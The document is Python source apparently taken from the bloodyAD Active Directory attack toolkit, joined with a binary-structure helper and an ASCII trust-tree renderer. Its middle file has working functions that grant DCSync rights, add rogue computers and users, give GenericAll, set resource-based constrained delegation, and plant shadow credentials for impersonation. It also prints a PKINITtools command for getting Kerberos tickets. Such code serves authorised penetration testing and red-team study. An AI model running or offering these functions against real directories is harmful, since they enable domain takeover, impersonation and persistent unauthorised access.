        addressField = self.findAddressFieldFor(field)
        if addressField is not None:
            if not self[addressField]:
                return 0

        try:
            lengthField = self.findLengthFieldFor(field)
            return int(self[lengthField])
        except Exception:
            pass

        # XXX: Try to match to actual values, raise if no match

        # quote specifier
        if format[:1] == "'" or format[:1] == '"':
            return len(format) - 1

        # address specifier
        two = format.split("&")
        if len(two) == 2:
            return self.calcUnpackSize(two[0], data)

        # code specifier
        two = format.split("=")
        if len(two) >= 2:
            return self.calcUnpackSize(two[0], data)

        # length specifier
        two = format.split("-")
        if len(two) == 2:
            return self.calcUnpackSize(two[0], data)

        # array specifier
        two = format.split("*")
        if len(two) == 2:
            answer = 0
            if two[0]:
                if two[0].isdigit():
                    number = int(two[0])
                else:
                    answer += self.calcUnpackSize(two[0], data)
                    number = self.unpack(two[0], data[:answer])

                while number:
                    number -= 1
                    answer += self.calcUnpackSize(two[1], data[answer:])
            else:
                while answer < len(data):
                    answer += self.calcUnpackSize(two[1], data[answer:])
            return answer

        # "printf" string specifier
        if format[:1] == "%":
            raise Exception(
                "Can't guess the size of a printf like specifier for unpacking"
            )

        # asciiz specifier
        if format[:1] == "z":
            return data.index(b("\x00")) + 1

        # asciiz specifier
        if format[:1] == "u":
            l = data.index(b("\x00\x00"))
            return l + (l & 1 and 3 or 2)

        # DCE-RPC/NDR string specifier
        if format[:1] == "w":
            l = unpack("<L", data[:4])[0]
            return 12 + l * 2

        # literal specifier
        if format[:1] == ":":
            return len(data)

        # struct like specifier
        return calcsize(format)

    def calcPackFieldSize(self, fieldName, format=None):
        if format is None:
            format = self.formatForField(fieldName)

        return self.calcPackSize(format, self[fieldName])

    def formatForField(self, fieldName):
        for field in self.commonHdr + self.structure:
            if field[0] == fieldName:
                return field[1]
        raise Exception("Field %s not found" % fieldName)

    def findAddressFieldFor(self, fieldName):
        descriptor = "&%s" % fieldName
        l = len(descriptor)
        for field in self.commonHdr + self.structure:
            if field[1][-l:] == descriptor:
                return field[0]
        return None

    def findLengthFieldFor(self, fieldName):
        descriptor = "-%s" % fieldName
        l = len(descriptor)
        for field in self.commonHdr + self.structure:
            if field[1][-l:] == descriptor:
                return field[0]
        return None

    def zeroValue(self, format):
        two = format.split("*")
        if len(two) == 2:
            if two[0].isdigit():
                return (self.zeroValue(two[1]),) * int(two[0])

        if not format.find("*") == -1:
            return ()
        if "s" in format:
            return b""
        if format in ["z", ":", "u"]:
            return b""
        if format == "w":
            return b("\x00\x00")

        return 0

    def clear(self):
        for field in self.commonHdr + self.structure:
            self[field[0]] = self.zeroValue(field[1])

    def dump(self, msg=None, indent=0):
        if msg is None:
            msg = self.__class__.__name__
        ind = " " * indent
        print("\n%s" % msg)
        fixedFields = []
        for field in self.commonHdr + self.structure:
            i = field[0]
            if i in self.fields:
                fixedFields.append(i)
                if isinstance(self[i], Structure):
                    self[i].dump("%s%s:{" % (ind, i), indent=indent + 4)
                    print("%s}" % ind)
                else:
                    print("%s%s: {%r}" % (ind, i, self[i]))
        # Do we have remaining fields not defined in the structures? let's
        # print them
        remainingFields = list(set(self.fields) - set(fixedFields))
        for i in remainingFields:
            if isinstance(self[i], Structure):
                self[i].dump("%s%s:{" % (ind, i), indent=indent + 4)
                print("%s}" % ind)
            else:
                print("%s%s: {%r}" % (ind, i, self[i]))


def pretty_print(x):
    if (
        chr(x)
        in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ "
    ):
        return chr(x)
    else:
        return "."


def hexdump(data, indent=""):
    if data is None:
        return
    if isinstance(data, int):
        data = str(data).encode("utf-8")
    x = bytearray(data)
    strLen = len(x)
    i = 0
    while i < strLen:
        line = " %s%04x   " % (indent, i)
        for j in range(16):
            if i + j < strLen:
                line += "%02X " % x[i + j]
            else:
                line += "   "
            if j % 16 == 7:
                line += " "
        line += "  "
        line += "".join(pretty_print(x) for x in x[i : i + 16])
        print(line)
        i += 16


def parse_bitmask(dict, value):
    ret = ""

    for i in range(0, 31):
        flag = 1 << i

        if value & flag == 0:
            continue

        if flag in dict:
            ret += "%s | " % dict[flag]
        else:
            ret += "0x%.8X | " % flag

    if len(ret) == 0:
        return "0"
    else:
        return ret[:-3]



import binascii, datetime, random, string
from typing import Literal
from bloodyAD import utils
from bloodyAD.exceptions import LOG
from bloodyAD.formatters import accesscontrol, common, cryptography, dns
from bloodyAD.network.ldap import Change, Scope
import msldap
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from bloodyAD.exceptions import BloodyError


def computer(conn, hostname: str, newpass: str, ou: str = "DefaultOU"):
    """
    Add new computer

    :param hostname: computer name (without trailing $)
    :param newpass: password for computer
    :param ou: Organizational Unit for computer
    """

    if ou == "DefaultOU":
        container = None
        for obj in next(
            conn.ldap.bloodysearch(conn.ldap.domainNC, attr=["wellKnownObjects"])
        )["wellKnownObjects"]:
            if "GUID_COMPUTERS_CONTAINER_W" == obj.binary_value:
                container = obj.dn
                break
        if not container:
            LOG.warning(
                "Default container for computers not found, defaulting to CN=Computers,"
                + conn.ldap.domainNC
            )
            container = "cn=Computers" + conn.ldap.domainNC
        computer_dn = f"cn={hostname},{container}"
    else:
        computer_dn = f"cn={hostname},{ou}"

    # Default computer SPNs
    spns = [
        "HOST/%s" % hostname,
        "HOST/%s.%s" % (hostname, conn.conf.domain),
        "RestrictedKrbHost/%s" % hostname,
        "RestrictedKrbHost/%s.%s" % (hostname, conn.conf.domain),
    ]
    attr = {
        "objectClass": [
            "top",
            "person",
            "organizationalPerson",
            "user",
            "computer",
        ],
        "dnsHostName": "%s.%s" % (hostname, conn.conf.domain),
        "userAccountControl": 0x1000,
        "servicePrincipalName": spns,
        "sAMAccountName": f"{hostname}$",
        "unicodePwd": '"%s"' % newpass,
    }

    conn.ldap.bloodyadd(computer_dn, attributes=attr)
    LOG.info(f"[+] {hostname} created")


def dcsync(conn, trustee: str):
    """
    Add DCSync right on domain to provided trustee (Requires to own or to have WriteDacl on domain object)

    :param trustee: sAMAccountName, DN, GUID or SID of the trustee
    """
    new_sd, _ = utils.getSD(conn, conn.ldap.domainNC)
    if "s-1-" in trustee.lower():
        trustee_sid = trustee
    else:
        trustee_sid = next(conn.ldap.bloodysearch(trustee, attr=["objectSid"]))[
            "objectSid"
        ]
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    utils.addRight(new_sd, trustee_sid, access_mask)

    req_flags = msldap.wintypes.asn1.sdflagsrequest.SDFlagsRequestValue(
        {"Flags": accesscontrol.DACL_SECURITY_INFORMATION}
    )
    controls = [("1.2.840.113556.1.4.801", True, req_flags.dump())]

    conn.ldap.bloodymodify(
        conn.ldap.domainNC,
        {"nTSecurityDescriptor": [(Change.REPLACE.value, new_sd.getData())]},
        controls,
    )

    LOG.info(f"[+] {trustee} is now able to DCSync")


# Credits to Kevin Robertson and his script Invoke-DNSUpdate.ps1 from the Powermad framework
def dnsRecord(
    conn,
    name: str,
    data: str,
    dnstype: Literal["A", "AAAA", "CNAME", "MX", "PTR", "SRV", "TXT"] = "A",
    zone: str = "CurrentDomain",
    ttl: int = 300,
    preference: int = 10,
    port: int = None,
    priority: int = 10,
    weight: int = 60,
    forest: bool = False,
):
    """
    This function adds a new DNS record into an AD environment.

    :param name: name of the dnsNode object (hostname) which will contain the new record
    :param data: DNS record data, for most record types this will be the destination hostname or IP address, for TXT records this can be used for text
    :param dnstype: DNS record type
    :param zone: DNS zone
    :param ttl: DNS record TTL, time in seconds the record stays in DNS caches, must be low if you want to propagate record updates quickly
    :param preference: DNS MX record preference, must be lower than the concurrent records to be chosen
    :param port: listening port of the service in a DNS SRV record
    :param priority: priority of a DNS SRV record against concurrent, must be lower to be chosen, if identical to others, highest weight will be chosen
    :param weight: weight of a DNS SRV record against concurrent, must be higher with the lowest priority to be chosen
    :param forest: if set, registers dns record in forest instead of domain
    """
    # DNS_RPC_RECORD - section 2.2.2.2.5
    # RANK_ZONE - The record comes from an authoritative zone
    rank = 0xF0

    naming_context = "," + conn.ldap.domainNC
    if zone == "CurrentDomain":
        zone = ""
        for label in naming_context.split(",DC="):
            if label:
                zone += "." + label
        if forest:
            zone = "_msdcs" + zone
        else:
            # Removes first dot
            zone = zone[1:]

    # TODO: take into account custom ForestDnsZones and DomainDnsZones partition name ?
    if forest:
        zone_type = "ForestDnsZones"
    else:
        zone_type = "DomainDnsZones"

    zone_dn = f"DC={zone},CN=MicrosoftDNS,DC={zone_type}{naming_context}"
    record_dn = None

    serial = None
    new_dnsrecord_list = None
    ldap_filter = f"(|(name=@)(name={name}))"
    for entry in conn.ldap.bloodysearch(
        zone_dn,
        ldap_filter=ldap_filter,
        search_scope=Scope.SUBTREE,
        attr=["name", "dnsRecord"],
        raw=True,
    ):
        if entry["name"][0] == b"@":
            for raw_record in entry["dnsRecord"]:
                dns_record = dns.Record(raw_record).toDict()
                if dns_record.get("Type") == "SOA":
                    serial = dns_record["Data"]["SerialNo"]
                    break
        else:
            record_dn = entry["distinguishedName"]
            new_dnsrecord_list = entry["dnsRecord"]

    if not serial:
        raise BloodyError(f"No '@' entry found in '{zone_dn}' with '{ldap_filter}'")
    new_dnsrecord = dns.Record()
    new_dnsrecord.fromDict(
        data, dnstype, ttl, rank, serial, preference, port, priority, weight
    )

    if not record_dn:
        record_dn = f"DC={name},{zone_dn}"
        record_attr = {
            "objectClass": ["top", "dnsNode"],
            "dnsRecord": new_dnsrecord.getData(),
            "dNSTombstoned": False,
        }
        conn.ldap.bloodyadd(record_dn, attributes=record_attr)
        LOG.info(f"[+] {name} has been successfully added")
        return

    new_dnsrecord_list.append(new_dnsrecord.getData())
    print(new_dnsrecord_list)
    conn.ldap.bloodymodify(
        record_dn, {"dnsRecord": [(Change.REPLACE.value, new_dnsrecord_list)]}
    )
    LOG.info(f"[+] {name} has been successfully updated")


def genericAll(conn, target: str, trustee: str):
    """
    Give full control to trustee on target (you must own the object or have WriteDacl)

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param trustee: sAMAccountName, DN, GUID or SID of the trustee which will have full control on target
    """
    new_sd, _ = utils.getSD(conn, target)
    if "s-1-" in trustee.lower():
        trustee_sid = trustee
    else:
        trustee_sid = next(conn.ldap.bloodysearch(trustee, attr=["objectSid"]))[
            "objectSid"
        ]
    utils.addRight(new_sd, trustee_sid)

    req_flags = msldap.wintypes.asn1.sdflagsrequest.SDFlagsRequestValue(
        {"Flags": accesscontrol.DACL_SECURITY_INFORMATION}
    )
    controls = [("1.2.840.113556.1.4.801", True, req_flags.dump())]

    conn.ldap.bloodymodify(
        target,
        {"nTSecurityDescriptor": [(Change.REPLACE.value, new_sd.getData())]},
        controls,
    )

    LOG.info(f"[+] {trustee} has now GenericAll on {target}")


def groupMember(conn, group: str, member: str):
    """
    Add a new member (user, group, computer) to group

    :param group: sAMAccountName, DN, GUID or SID of the group
    :param member: sAMAccountName, DN, GUID or SID of the member
    """
    # This is equivalent to classic add member,
    # see [MS-ADTS] - 3.1.1.3.1.2.4 Alternative Forms of DNs
    # But <SID='sid'> also has the advantage of being compatible with foreign security principals,
    # see [MS-ADTS] - 3.1.1.5.3.3 Processing Specifics
    if "s-1-" in member.lower():
        # We assume member is an SID
        member_transformed = f"<SID={member}>"
    else:
        member_transformed = conn.ldap.dnResolver(member)

    conn.ldap.bloodymodify(group, {"member": [(Change.ADD.value, member_transformed)]})
    LOG.info(f"[+] {member} added to {group}")


def rbcd(conn, target: str, service: str):
    """
    Add Resource Based Constraint Delegation for service on target, used to impersonate a user on target with service (Requires "Write" permission on target's msDS-AllowedToActOnBehalfOfOtherIdentity and Windows Server >= 2012)

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param service: sAMAccountName, DN, GUID or SID of the service account
    """
    control_flag = 0
    new_sd, _ = utils.getSD(
        conn, target, "msDS-AllowedToActOnBehalfOfOtherIdentity", control_flag
    )
    if "s-1-" in service.lower():
        service_sid = service
    else:
        service_sid = next(conn.ldap.bloodysearch(service, attr=["objectSid"]))[
            "objectSid"
        ]
    access_mask = accesscontrol.ACCESS_FLAGS["ADS_RIGHT_DS_CONTROL_ACCESS"]
    utils.addRight(new_sd, service_sid, access_mask)

    conn.ldap.bloodymodify(
        target,
        {
            "msDS-AllowedToActOnBehalfOfOtherIdentity": [
                (
                    Change.REPLACE.value,
                    new_sd.getData(),
                )
            ]
        },
    )

    LOG.info(f"[+] {service} can now impersonate users on {target} via S4U2Proxy")


def shadowCredentials(conn, target: str, path: str = "CurrentPath"):
    """
    Add Key Credentials to target, used to impersonate target with added credentials

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param path: filepath for the generated Key Credentials certificate
    """
    if path == "CurrentPath":
        path = None

    target_dn = conn.ldap.dnResolver(target)
    LOG.debug("[*] Generating certificate")

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    issuer = x509.Name(
        [
            x509.NameAttribute(NameOID.COMMON_NAME, target_dn),
        ]
    )
    cert = (
        x509.CertificateBuilder()
        .subject_name(issuer)
        .issuer_name(issuer)
        .serial_number(x509.random_serial_number())
        .public_key(key.public_key())
        .not_valid_before(datetime.datetime.utcnow())
        .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
        .sign(key, hashes.SHA256())
    )

    LOG.debug("[+] Certificate generated")
    LOG.debug("[*] Generating KeyCredential")

    keyCredential = cryptography.KEYCREDENTIALLINK_BLOB()
    keyCredential.keyCredentialLink_from_x509(cert)

    LOG.info(
        "[+] KeyCredential generated with following sha256 of RSA key: %s"
        % binascii.hexlify(keyCredential.getKeyID()).decode()
    )

    LOG.debug("[*] Updating the msDS-KeyCredentialLink attribute of %s" % target)

    key_dnbinary = common.DNBinary()
    key_dnbinary.fromCanonical(keyCredential.getData(), target_dn)
    conn.ldap.bloodymodify(
        target_dn,
        {"msDS-KeyCredentialLink": [(Change.ADD.value, str(key_dnbinary))]},
    )

    LOG.debug("[+] msDS-KeyCredentialLink attribute of the target object updated")
    if not path:
        path = "".join(
            random.choice(string.ascii_letters + string.digits) for i in range(8)
        )
        LOG.info(
            "No outfile path was provided. The certificate(s) will be"
            " stored with the filename: %s" % path
        )

    key_path = path + "_priv.pem"
    with open(key_path, "wb") as f:
        f.write(
            key.private_bytes(
                serialization.Encoding.PEM,
                serialization.PrivateFormat.TraditionalOpenSSL,
                serialization.NoEncryption(),
            )
        )
    cert_path = path + "_cert.pem"
    with open(cert_path, "wb") as f:
        f.write(cert.public_bytes(serialization.Encoding.PEM))

    # TODO: Generate TGT on the fly
    LOG.info("[+] Saved PEM certificate at path: %s" % cert_path)
    LOG.info("[+] Saved PEM private key at path: %s" % key_path)
    LOG.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
    LOG.info("Run the following command to obtain a TGT:")
    LOG.info(
        "python3 PKINITtools/gettgtpkinit.py -cert-pem %s -key-pem %s %s/%s %s.ccache"
        % (cert_path, key_path, conn.conf.domain, target, path)
    )


def uac(conn, target: str, f: list = None):
    """
    Add property flags altering user/computer object behavior

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param f: name of property flag to add, can be called multiple times if multiple flags to add (e.g -f DONT_REQ_PREAUTH  -f DONT_EXPIRE_PASSWORD)
    """
    # TODO: Give scenarios with interesting account control flags

    # List of flags: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties

    # Some flags are computed (so can't be set directly? seems it depends because LOCKOUT can be removed but not added): LOCKOUT, PASSWORD_EXPIRED, PARTIAL_SECRETS_ACCOUNT, USE_AES_KEYS
    # https://learn.microsoft.com/en-us/windows/win32/adschema/a-msds-user-account-control-computed

    # The following flags are mutually exclusives and can't be changed by NetUserSetInfo (so maybe not modifiable at all?):
    # NORMAL_ACCOUNT, TEMP_DUPLICATE_ACCOUNT, WORKSTATION_TRUST_ACCOUNT, SERVER_TRUST_ACCOUNT, INTERDOMAIN_TRUST_ACCOUNT
    # https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/ns-lmaccess-user_info_1008#members

    # Privileges needed for TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION,TRUSTED_FOR_DELEGATION,PASSWD_NOTREQD,DONT_EXPIRE_PASSWD,ENCRYPTED_TEXT_PASSWORD_ALLOWED,SERVER_TRUST_ACCOUNT:
    # https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netusersetinfo#remarks

    uac = 0
    for flag in f:
        uac |= accesscontrol.ACCOUNT_FLAGS[flag]

    try:
        old_uac = next(
            conn.ldap.bloodysearch(target, attr=["userAccountControl"], raw=True)
        )["userAccountControl"][0]
    except IndexError as e:
        for allowed in next(conn.ldap.bloodysearch(target, attr=["allowedAttributes"]))[
            "allowedAttributes"
        ]:
            if "userAccountControl" in allowed:
                raise BloodyError(
                    "Current user doesn't have the right to read userAccountControl on"
                    f" {target}"
                ) from e
        raise BloodyError(f"{target} doesn't have userAccountControl attribute") from e
    uac |= int(old_uac)
    conn.ldap.bloodymodify(
        target, {"userAccountControl": [(Change.REPLACE.value, uac)]}
    )

    LOG.info(f"[-] {f} property flags added to {target}'s userAccountControl")


def user(conn, sAMAccountName: str, newpass: str, ou: str = "DefaultOU"):
    """
    Add a new user

    :param sAMAccountName: sAMAccountName for new user
    :param newpass: password for new user
    :param ou: Organizational Unit for new user
    """
    if ou == "DefaultOU":
        container = None
        for obj in next(
            conn.ldap.bloodysearch(conn.ldap.domainNC, attr=["wellKnownObjects"])
        )["wellKnownObjects"]:
            if "GUID_USERS_CONTAINER_W" == obj.binary_value:
                container = obj.dn
                break
        if not container:
            LOG.warning(
                "Default container for users not found, defaulting to CN=Users,"
                + conn.ldap.domainNC
            )
            container = "cn=Users" + conn.ldap.domainNC
        user_dn = f"cn={sAMAccountName},{container}"
    else:
        user_dn = f"cn={sAMAccountName},{ou}"

    attr = {
        "objectClass": ["top", "person", "organizationalPerson", "user"],
        "distinguishedName": user_dn,
        "sAMAccountName": sAMAccountName,
        "userAccountControl": 544,
        "unicodePwd": '"%s"' % newpass,
    }

    conn.ldap.bloodyadd(user_dn, attributes=attr)
    LOG.info(f"[+] {sAMAccountName} created")



#!/usr/bin/env python
# -*- coding: utf-8 -*-

from .drawing import BoxStyle
from .traversal import DictTraversal
from .util import KeyArgsConstructor
from bloodyAD.formatters import common, formatters


# Explore the trust_dict level by level and populate a branch provided in to_explore
def branchFactory(to_explore, explored, trust_dict):
    next_explore = {}
    for ascii_parent, parent_dict in to_explore.items():
        parent = ascii_parent.rsplit(":")[-1]
        if parent in explored:
            continue
        explored.append(parent)

        for child_name, child in trust_dict.get(parent, {}).items():
            # If it's a root key in trust_dict, it means we have been able to connect to it and explore it
            # So there is somewhere an INBOUND parent
            # So do not print the node below this parent, it will be printed below one with INBOUND
            if not (
                int(child["trustDirection"][0].decode())
                & common.TRUST_DIRECTION["INBOUND"]
            ) and (child_name in trust_dict):
                continue
            # If it's already explored no need to print it again it will only show the opposite trust direction and nothing new
            if child_name in explored:
                continue

            # Format child in ascii representation
            ascii_child = ""
            flags = []
            if (
                int(child["trustDirection"][0].decode())
                & common.TRUST_DIRECTION["OUTBOUND"]
            ):
                ascii_child += "<"
            # TODO: trustAttributes not printed all the time, find the root cause and fix it
            trustFlags = formatters.formatTrustAttributes(child["trustAttributes"][0])
            if trustFlags:
                flags += trustFlags
            else:
                flags += [child["trustAttributes"][0].decode()]
            flags.append(formatters.formatTrustType(child["trustType"][0]))
            ascii_child += "|".join(flags)
            if (
                int(child["trustDirection"][0].decode())
                & common.TRUST_DIRECTION["INBOUND"]
            ):
                ascii_child += ">"
            ascii_child += ":" + child["trustPartner"][0].decode()
            parent_dict[ascii_child] = {}

        next_explore = {**next_explore, **parent_dict}

    if next_explore:
        branchFactory(next_explore, explored, trust_dict)


class LeftAligned(KeyArgsConstructor):
    """Creates a renderer for a left-aligned tree.

    Any attributes of the resulting class instances can be set using
    constructor arguments."""

    draw = BoxStyle()
    "The draw style used. See :class:`~asciitree.drawing.Style`."
    traverse = DictTraversal()
    "Traversal method. See :class:`~asciitree.traversal.Traversal`."

    def render(self, node):
        """Renders a node. This function is used internally, as it returns
        a list of lines. Use :func:`~asciitree.LeftAligned.__call__` instead.
        """
        lines = []

        children = self.traverse.get_children(node)
        lines.append(self.draw.node_label(self.traverse.get_text(node)))

        for n, child in enumerate(children):
            child_tree = self.render(child)

            if n == len(children) - 1:
                # last child does not get the line drawn
                lines.append(self.draw.last_child_head(child_tree.pop(0)))
                lines.extend(self.draw.last_child_tail(l) for l in child_tree)
            else:
                lines.append(self.draw.child_head(child_tree.pop(0)))
                lines.extend(self.draw.child_tail(l) for l in child_tree)

        return lines

    def __call__(self, tree):
        """Render the tree into string suitable for console output.

        :param tree: A tree."""
        return "\n".join(self.render(self.traverse.get_root(tree)))


# legacy support below

from .drawing import Style
from .traversal import Traversal


class LegacyStyle(Style):
    def node_label(self, text):
        return text

    def child_head(self, label):
        return "  +--" + label

    def child_tail(self, line):
        return "  |" + line

    def last_child_head(self, label):
        return "  +--" + label

    def last_child_tail(self, line):
        return "   " + line


def draw_tree(node, child_iter=lambda n: n.children, text_str=str):
    """Support asciitree 0.2 API.

    This function solely exist to not break old code (using asciitree 0.2).
    Its use is deprecated."""
    return LeftAligned(
        traverse=Traversal(get_text=text_str, get_children=child_iter),
        draw=LegacyStyle(),
    )(node)
